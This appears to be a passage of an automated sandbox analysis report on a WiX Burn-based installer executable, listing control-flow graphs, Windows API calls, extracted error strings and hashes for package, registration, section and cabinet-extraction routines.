                                                                                                                                                              • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                                                                                                              • API String ID: 336948655-2953049543
                                                                                                                                                              • Opcode ID: 96d09cfd6647bc5edf0e3a90a38c18a3d074fffae51e67cf20b7abee3f678c7d
                                                                                                                                                              • Instruction ID: 1d625da7345dabc31d240f052ee5a54ebd58c226074b13c394dadb309dc10f24
                                                                                                                                                              • Opcode Fuzzy Hash: 96d09cfd6647bc5edf0e3a90a38c18a3d074fffae51e67cf20b7abee3f678c7d
                                                                                                                                                              • Instruction Fuzzy Hash: 3232C232D4022ABBCB11DFA4ED41FAEB6B4BF14721F114A65F911BB2D0D771AD10AB90
                                                                                                                                                              Function 00A0F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 222 a0f9e3-a0fa14 call a439af 225 a0fa16 222->225 226 a0fa18-a0fa1a 222->226 225->226 227 a0fa1c-a0fa29 call a40237 226->227 228 a0fa2e-a0fa47 call a432f3 226->228 233 a0ff16-a0ff1b 227->233 234 a0fa53-a0fa68 call a432f3 228->234 235 a0fa49-a0fa4e 228->235 236 a0ff23-a0ff28 233->236 237 a0ff1d-a0ff1f 233->237 246 a0fa74-a0fa81 call a0ea42 234->246 247 a0fa6a-a0fa6f 234->247 238 a0ff0d-a0ff14 call a40237 235->238 240 a0ff30-a0ff35 236->240 241 a0ff2a-a0ff2c 236->241 237->236 252 a0ff15 238->252 244 a0ff37-a0ff39 240->244 245 a0ff3d-a0ff41 240->245 241->240 244->245 249 a0ff43-a0ff46 call a45636 245->249 250 a0ff4b-a0ff52 245->250 255 a0fa83-a0fa88 246->255 256 a0fa8d-a0faa2 call a432f3 246->256 247->238 249->250 252->233 255->238 259 a0faa4-a0faa9 256->259 260 a0faae-a0fac0 call a44c97 256->260 259->238 263 a0fac2-a0faca 260->263 264 a0facf-a0fae4 call a432f3 260->264 265 a0fd99-a0fda2 call a40237 263->265 269 a0faf0-a0fb05 call a432f3 264->269 270 a0fae6-a0faeb 264->270 265->252 274 a0fb11-a0fb23 call a43505 269->274 275 a0fb07-a0fb0c 269->275 270->238 278 a0fb25-a0fb2a 274->278 279 a0fb2f-a0fb45 call a439af 274->279 275->238 278->238 282 a0fdf4-a0fe0e call a0ecbe 279->282 283 a0fb4b-a0fb4d 279->283 290 a0fe10-a0fe15 282->290 291 a0fe1a-a0fe32 call a439af 282->291 284 a0fb59-a0fb6e call a43505 283->284 285 a0fb4f-a0fb54 283->285 292 a0fb70-a0fb75 284->292 293 a0fb7a-a0fb8f call a432f3 284->293 285->238 290->238 297 a0fe38-a0fe3a 291->297 298 a0fefc-a0fefd call a0f0f8 291->298 292->238 300 a0fb91-a0fb93 293->300 301 a0fb9f-a0fbb4 call a432f3 293->301 302 a0fe46-a0fe64 call a432f3 297->302 303 a0fe3c-a0fe41 297->303 308 a0ff02-a0ff06 298->308 300->301 305 a0fb95-a0fb9a 300->305 312 a0fbc4-a0fbd9 call a432f3 301->312 313 a0fbb6-a0fbb8 301->313 314 a0fe70-a0fe88 call a432f3 302->314 315 a0fe66-a0fe6b 302->315 303->238 305->238 308->252 311 a0ff08 308->311 311->238 323 a0fbe9-a0fbfe call a432f3 312->323 324 a0fbdb-a0fbdd 312->324 313->312 316 a0fbba-a0fbbf 313->316 321 a0fe95-a0fead call a432f3 314->321 322 a0fe8a-a0fe8c 314->322 315->238 316->238 331 a0feba-a0fed2 call a432f3 321->331 332 a0feaf-a0feb1 321->332 322->321 325 a0fe8e-a0fe93 322->325 333 a0fc00-a0fc02 323->333 334 a0fc0e-a0fc23 call a432f3 323->334 324->323 326 a0fbdf-a0fbe4 324->326 325->238 326->238 341 a0fed4-a0fed9 331->341 342 a0fedb-a0fef3 call a432f3 331->342 332->331 338 a0feb3-a0feb8 332->338 333->334 335 a0fc04-a0fc09 333->335 343 a0fc33-a0fc48 call a432f3 334->343 344 a0fc25-a0fc27 334->344 335->238 338->238 341->238 342->298 350 a0fef5-a0fefa 342->350 351 a0fc58-a0fc6d call a432f3 343->351 352 a0fc4a-a0fc4c 343->352 344->343 346 a0fc29-a0fc2e 344->346 346->238 350->238 356 a0fc7d-a0fc92 call a432f3 351->356 357 a0fc6f-a0fc71 351->357 352->351 353 a0fc4e-a0fc53 352->353 353->238 361 a0fca2-a0fcba call a432f3 356->361 362 a0fc94-a0fc96 356->362 357->356 359 a0fc73-a0fc78 357->359 359->238 366 a0fcca-a0fce2 call a432f3 361->366 367 a0fcbc-a0fcbe 361->367 362->361 363 a0fc98-a0fc9d 362->363 363->238 371 a0fcf2-a0fd07 call a432f3 366->371 372 a0fce4-a0fce6 366->372 367->366 368 a0fcc0-a0fcc5 367->368 368->238 376 a0fda7-a0fda9 371->376 377 a0fd0d-a0fd2a CompareStringW 371->377 372->371 374 a0fce8-a0fced 372->374 374->238 378 a0fdb4-a0fdb6 376->378 379 a0fdab-a0fdb2 376->379 380 a0fd34-a0fd49 CompareStringW 377->380 381 a0fd2c-a0fd32 377->381 382 a0fdc2-a0fdda call a43505 378->382 383 a0fdb8-a0fdbd 378->383 379->378 385 a0fd57-a0fd6c CompareStringW 380->385 386 a0fd4b-a0fd55 380->386 384 a0fd75-a0fd7a 381->384 382->282 392 a0fddc-a0fdde 382->392 383->238 384->378 388 a0fd7c-a0fd94 call a03821 385->388 389 a0fd6e 385->389 386->384 388->265 389->384 394 a0fde0-a0fde5 392->394 395 a0fdea 392->395 394->238 395->282
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                              • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                              • API String ID: 760788290-2956246334
                                                                                                                                                              • Opcode ID: bdca272faf8ed17b2eed0a43e6877c509fc5c05cbf6045c93fc1ff29f085da7e
                                                                                                                                                              • Instruction ID: 1627fa5c421a8a80199b89867b868db9ea709da89b78a04f1e20c40c7442471d
                                                                                                                                                              • Opcode Fuzzy Hash: bdca272faf8ed17b2eed0a43e6877c509fc5c05cbf6045c93fc1ff29f085da7e
                                                                                                                                                              • Instruction Fuzzy Hash: A5E1E032E4466EBECF31A6A4DD42FBEB6A4BB01711F110671FD11B69D1DBB09D0496C0
                                                                                                                                                              Function 00A0B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 396 a0b48b-a0b500 call a2f8e0 * 2 401 a0b502-a0b50c GetLastError 396->401 402 a0b538-a0b53e 396->402 403 a0b519 401->403 404 a0b50e-a0b517 401->404 405 a0b540 402->405 406 a0b542-a0b554 SetFilePointerEx 402->406 407 a0b520-a0b52d call a03821 403->407 408 a0b51b 403->408 404->403 405->406 409 a0b556-a0b560 GetLastError 406->409 410 a0b588-a0b5a2 ReadFile 406->410 426 a0b532-a0b533 407->426 408->407 414 a0b562-a0b56b 409->414 415 a0b56d 409->415 411 a0b5a4-a0b5ae GetLastError 410->411 412 a0b5d9-a0b5e0 410->412 416 a0b5b0-a0b5b9 411->416 417 a0b5bb 411->417 419 a0b5e6-a0b5ef 412->419 420 a0bbd7-a0bbeb call a03821 412->420 414->415 421 a0b574-a0b586 call a03821 415->421 422 a0b56f 415->422 416->417 424 a0b5c2-a0b5d4 call a03821 417->424 425 a0b5bd 417->425 419->420 428 a0b5f5-a0b605 SetFilePointerEx 419->428 438 a0bbf0 420->438 421->426 422->421 424->426 425->424 431 a0bbf1-a0bbf7 call a40237 426->431 433 a0b607-a0b611 GetLastError 428->433 434 a0b63c-a0b654 ReadFile 428->434 449 a0bbf8-a0bc0a call a2e06f 431->449 440 a0b613-a0b61c 433->440 441 a0b61e 433->441 435 a0b656-a0b660 GetLastError 434->435 436 a0b68b-a0b692 434->436 446 a0b662-a0b66b 435->446 447 a0b66d 435->447 442 a0b698-a0b6a2 436->442 443 a0bbbc-a0bbd5 call a03821 436->443 438->431 440->441 444 a0b620 441->444 445 a0b625-a0b632 call a03821 441->445 442->443 450 a0b6a8-a0b6cb SetFilePointerEx 442->450 443->438 444->445 445->434 446->447 453 a0b674-a0b681 call a03821 447->453 454 a0b66f 447->454 456 a0b702-a0b71a ReadFile 450->456 457 a0b6cd-a0b6d7 GetLastError 450->457 453->436 454->453 464 a0b751-a0b769 ReadFile 456->464 465 a0b71c-a0b726 GetLastError 456->465 462 a0b6e4 457->462 463 a0b6d9-a0b6e2 457->463 469 a0b6e6 462->469 470 a0b6eb-a0b6f8 call a03821 462->470 463->462 467 a0b7a0-a0b7bb SetFilePointerEx 464->467 468 a0b76b-a0b775 GetLastError 464->468 471 a0b733 465->471 472 a0b728-a0b731 465->472 476 a0b7f5-a0b814 ReadFile 467->476 477 a0b7bd-a0b7c7 GetLastError 467->477 473 a0b782 468->473 474 a0b777-a0b780 468->474 469->470 470->456 478 a0b735 471->478 479 a0b73a-a0b747 call a03821 471->479 472->471 483 a0b784 473->483 484 a0b789-a0b796 call a03821 473->484 474->473 481 a0b81a-a0b81c 476->481 482 a0bb7d-a0bb87 GetLastError 476->482 486 a0b7d4 477->486 487 a0b7c9-a0b7d2 477->487 478->479 479->464 491 a0b81d-a0b824 481->491 493 a0bb94 482->493 494 a0bb89-a0bb92 482->494 483->484 484->467 488 a0b7d6 486->488 489 a0b7db-a0b7eb call a03821 486->489 487->486 488->489 489->476 496 a0bb58-a0bb75 call a03821 491->496 497 a0b82a-a0b836 491->497 499 a0bb96 493->499 500 a0bb9b-a0bbb1 call a03821 493->500 494->493 512 a0bb7a-a0bb7b 496->512 504 a0b841-a0b84a 497->504 505 a0b838-a0b83f 497->505 499->500 511 a0bbb2-a0bbba call a40237 500->511 509 a0b850-a0b876 ReadFile 504->509 510 a0bb1b-a0bb32 call a03821 504->510 505->504 508 a0b884-a0b88b 505->508 514 a0b8b4-a0b8cb call a0394f 508->514 515 a0b88d-a0b8af call a03821 508->515 509->482 513 a0b87c-a0b882 509->513 522 a0bb37-a0bb3d call a40237 510->522 511->449 512->511 513->491 526 a0b8cd-a0b8ea call a03821 514->526 527 a0b8ef-a0b904 SetFilePointerEx 514->527 515->512 532 a0bb43-a0bb44 522->532 526->431 530 a0b944-a0b969 ReadFile 527->530 531 a0b906-a0b910 GetLastError 527->531 533 a0b9a0-a0b9ac 530->533 534 a0b96b-a0b975 GetLastError 530->534 536 a0b912-a0b91b 531->536 537 a0b91d 531->537 538 a0bb45-a0bb47 532->538 541 a0b9ae-a0b9ca call a03821 533->541 542 a0b9cf-a0b9d3 533->542 539 a0b982 534->539 540 a0b977-a0b980 534->540 536->537 543 a0b924-a0b934 call a03821 537->543 544 a0b91f 537->544 538->449 545 a0bb4d-a0bb53 call a03a16 538->545 546 a0b984 539->546 547 a0b989-a0b99e call a03821 539->547 540->539 541->522 550 a0b9d5-a0ba09 call a03821 call a40237 542->550 551 a0ba0e-a0ba21 call a44a05 542->551 562 a0b939-a0b93f call a40237 543->562 544->543 545->449 546->547 547->562 550->538 565 a0ba23-a0ba28 551->565 566 a0ba2d-a0ba37 551->566 562->532 565->562 569 a0ba41-a0ba49 566->569 570 a0ba39-a0ba3f 566->570 572 a0ba55-a0ba58 569->572 573 a0ba4b-a0ba53 569->573 571 a0ba5a-a0baba call a0394f 570->571 576 a0babc-a0bad8 call a03821 571->576 577 a0bade-a0baff call a2f360 call a0b208 571->577 572->571 573->571 576->577 577->538 584 a0bb01-a0bb11 call a03821 577->584 584->510
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B502
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B550
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B556
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00A04461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B59E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B5A4
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B601
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B607
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B650
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B656
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B6C7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B6CD
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B716
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B71C
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B765
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B76B
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B7B7
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B7BD
                                                                                                                                                                • Part of subcall function 00A0394F: GetProcessHeap.KERNEL32(?,?,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03960
                                                                                                                                                                • Part of subcall function 00A0394F: RtlAllocateHeap.NTDLL(00000000,?,00A02274,?,00000001,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03967
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B810
                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B872
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B8FC
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00A0B906
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                              • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                                                                                                              • API String ID: 3411815225-695169583
                                                                                                                                                              • Opcode ID: 600d5d5a3c26bdfdea1c62f84e6b0bde83fdbfdf95c4981ddc7b49ea2d7e3663
                                                                                                                                                              • Instruction ID: 2c250cc2c7c60830b7a25955e9590b91a9f0809c5acf9985bc81fb5acc500761
                                                                                                                                                              • Opcode Fuzzy Hash: 600d5d5a3c26bdfdea1c62f84e6b0bde83fdbfdf95c4981ddc7b49ea2d7e3663
                                                                                                                                                              • Instruction Fuzzy Hash: 7112F67AA51239BBDB30CB559E46FAA76B8BB85B10F0141A5FD04BB2C0D7719D408BF0
                                                                                                                                                              Function 00A20D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306synchronizationCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 587 a20d16-a20d2d SetEvent 588 a20d6f-a20d7d WaitForSingleObject 587->588 589 a20d2f-a20d39 GetLastError 587->589 590 a20db4-a20dbf ResetEvent 588->590 591 a20d7f-a20d89 GetLastError 588->591 592 a20d46 589->592 593 a20d3b-a20d44 589->593 596 a20dc1-a20dcb GetLastError 590->596 597 a20df9-a20dff 590->597 594 a20d96 591->594 595 a20d8b-a20d94 591->595 598 a20d48 592->598 599 a20d4d-a20d5d call a03821 592->599 593->592 602 a20d98 594->602 603 a20d9d-a20db2 call a03821 594->603 595->594 604 a20dd8 596->604 605 a20dcd-a20dd6 596->605 600 a20e32-a20e4b call a021ac 597->600 601 a20e01-a20e04 597->601 598->599 618 a20d62-a20d6a call a40237 599->618 621 a20e63-a20e6e SetEvent 600->621 622 a20e4d-a20e5e call a40237 600->622 607 a20e06-a20e23 call a03821 601->607 608 a20e28-a20e2d 601->608 602->603 603->618 611 a20dda 604->611 612 a20ddf-a20df4 call a03821 604->612 605->604 627 a210de-a210e4 call a40237 607->627 615 a210e8-a210ed 608->615 611->612 612->618 623 a210f2-a210f8 615->623 624 a210ef 615->624 618->615 629 a20e70-a20e7a GetLastError 621->629 630 a20ea8-a20eb6 WaitForSingleObject 621->630 641 a210e5-a210e7 622->641 624->623 627->641 636 a20e87 629->636 637 a20e7c-a20e85 629->637 632 a20ef0-a20efb ResetEvent 630->632 633 a20eb8-a20ec2 GetLastError 630->633 642 a20f35-a20f3c 632->642 643 a20efd-a20f07 GetLastError 632->643 638 a20ec4-a20ecd 633->638 639 a20ecf 633->639 644 a20e89 636->644 645 a20e8e-a20ea3 call a03821 636->645 637->636 638->639 649 a20ed1 639->649 650 a20ed6-a20eeb call a03821 639->650 641->615 647 a20fab-a20fce CreateFileW 642->647 648 a20f3e-a20f41 642->648 651 a20f14 643->651 652 a20f09-a20f12 643->652 644->645 662 a210dd 645->662 654 a20fd0-a20fda GetLastError 647->654 655 a2100b-a2101f SetFilePointerEx 647->655 656 a20f43-a20f46 648->656 657 a20f6e-a20f72 call a0394f 648->657 649->650 650->662 659 a20f16 651->659 660 a20f1b-a20f30 call a03821 651->660 652->651 663 a20fe7 654->663 664 a20fdc-a20fe5 654->664 668 a21021-a2102b GetLastError 655->668 669 a21059-a21064 SetEndOfFile 655->669 665 a20f67-a20f69 656->665 666 a20f48-a20f4b 656->666 680 a20f77-a20f7c 657->680 659->660 660->662 662->627 674 a20fe9 663->674 675 a20fee-a21001 call a03821 663->675 664->663 665->615 676 a20f5d-a20f62 666->676 677 a20f4d-a20f53 666->677 678 a21038 668->678 679 a2102d-a21036 668->679 672 a21066-a21070 GetLastError 669->672 673 a2109b-a210a8 SetFilePointerEx 669->673 681 a21072-a2107b 672->681 682 a2107d 672->682 673->641 684 a210aa-a210b4 GetLastError 673->684 674->675 675->655 676->641 677->676 687 a2103a 678->687 688 a2103f-a21054 call a03821 678->688 679->678 685 a20f7e-a20f98 call a03821 680->685 686 a20f9d-a20fa6 680->686 681->682 690 a21084-a21099 call a03821 682->690 691 a2107f 682->691 693 a210c1 684->693 694 a210b6-a210bf 684->694 685->662 686->641 687->688 688->662 690->662 691->690 699 a210c3 693->699 700 a210c8-a210d8 call a03821 693->700 694->693 699->700 700->662
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,00A208BC,?,?), ref: 00A20D25
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A208BC,?,?), ref: 00A20D2F
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00A208BC,?,?), ref: 00A20D74
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A208BC,?,?), ref: 00A20D7F
                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,?,?,00A208BC,?,?), ref: 00A20DB7
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00A208BC,?,?), ref: 00A20DC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                              • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 1865021742-2104912459
                                                                                                                                                              • Opcode ID: ccb076c57e92374508950f2b4141bb38c78333c8a0a44589837f1cb84f9ac107
                                                                                                                                                              • Instruction ID: e8ab94973d349c858cef6f18012f148b4b3f855cf289e789d1e04728fdf9c321
                                                                                                                                                              • Opcode Fuzzy Hash: ccb076c57e92374508950f2b4141bb38c78333c8a0a44589837f1cb84f9ac107
                                                                                                                                                              • Instruction Fuzzy Hash: 6091183BA85632B7D73057ED6E09F6A7954BF21B21F124731BE10BA6C1D761DC0082E1
                                                                                                                                                              Function 00A05195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 704 a05195-a05243 call a2f8e0 * 2 GetModuleHandleW call a404f8 call a406ae call a0120a 715 a05245 704->715 716 a05259-a0526a call a042d7 704->716 717 a0524a-a05254 call a40237 715->717 721 a05273-a0528f call a05618 CoInitializeEx 716->721 722 a0526c-a05271 716->722 725 a054d4-a054db 717->725 732 a05291-a05296 721->732 733 a05298-a052a4 call a3fcae 721->733 722->717 727 a054e8-a054ea 725->727 728 a054dd-a054e3 call a45636 725->728 730 a054fa-a05518 call a0d82f call a1a8d6 call a1ab24 727->730 731 a054ec-a054f3 727->731 728->727 754 a05546-a05559 call a04fa4 730->754 755 a0551a-a05522 730->755 731->730 734 a054f5 call a141ec 731->734 732->717 741 a052a6 733->741 742 a052b8-a052c7 call a40e07 733->742 734->730 744 a052ab-a052b3 call a40237 741->744 751 a052d0-a052df call a42af7 742->751 752 a052c9-a052ce 742->752 744->725 759 a052e1-a052e6 751->759 760 a052e8-a052f7 call a43565 751->760 752->744 764 a05560-a05567 754->764 765 a0555b call a43a35 754->765 755->754 758 a05524-a05527 755->758 758->754 762 a05529-a05544 call a1434c call a05602 758->762 759->744 773 a05300-a0531f GetVersionExW 760->773 774 a052f9-a052fe 760->774 762->754 770 a05569 call a42efe 764->770 771 a0556e-a05575 764->771 765->764 770->771 776 a05577 call a41479 771->776 777 a0557c-a05583 771->777 779 a05321-a0532b GetLastError 773->779 780 a05359-a0539e call a033c7 call a05602 773->780 774->744 776->777 782 a05585 call a3fdbd 777->782 783 a0558a-a0558c 777->783 788 a05338 779->788 789 a0532d-a05336 779->789 806 a053a0-a053ab call a45636 780->806 807 a053b1-a053c1 call a1752a 780->807 782->783 786 a05594-a0559b 783->786 787 a0558e CoUninitialize 783->787 791 a055d6-a055df call a40113 786->791 792 a0559d-a0559f 786->792 787->786 793 a0533a 788->793 794 a0533f-a05354 call a03821 788->794 789->788 804 a055e1 call a045ee 791->804 805 a055e6-a055ff call a40802 call a2e06f 791->805 797 a055a1-a055a3 792->797 798 a055a5-a055ab 792->798 793->794 794->744 802 a055ad-a055c6 call a13d85 call a05602 797->802 798->802 802->791 823 a055c8-a055d5 call a05602 802->823 804->805 806->807 819 a053c3 807->819 820 a053cd-a053d6 807->820 819->820 824 a053dc-a053df 820->824 825 a0549e-a054b4 call a04d39 820->825 823->791 828 a053e5-a053e8 824->828 829 a05476-a05489 call a04ae5 824->829 838 a054c0-a054d2 825->838 839 a054b6 825->839 830 a053ea-a053ed 828->830 831 a0544e-a0546a call a048ef 828->831 837 a0548e-a05492 829->837 835 a05426-a05442 call a04a88 830->835 836 a053ef-a053f2 830->836 831->838 846 a0546c 831->846 835->838 850 a05444 835->850 842 a05403-a05416 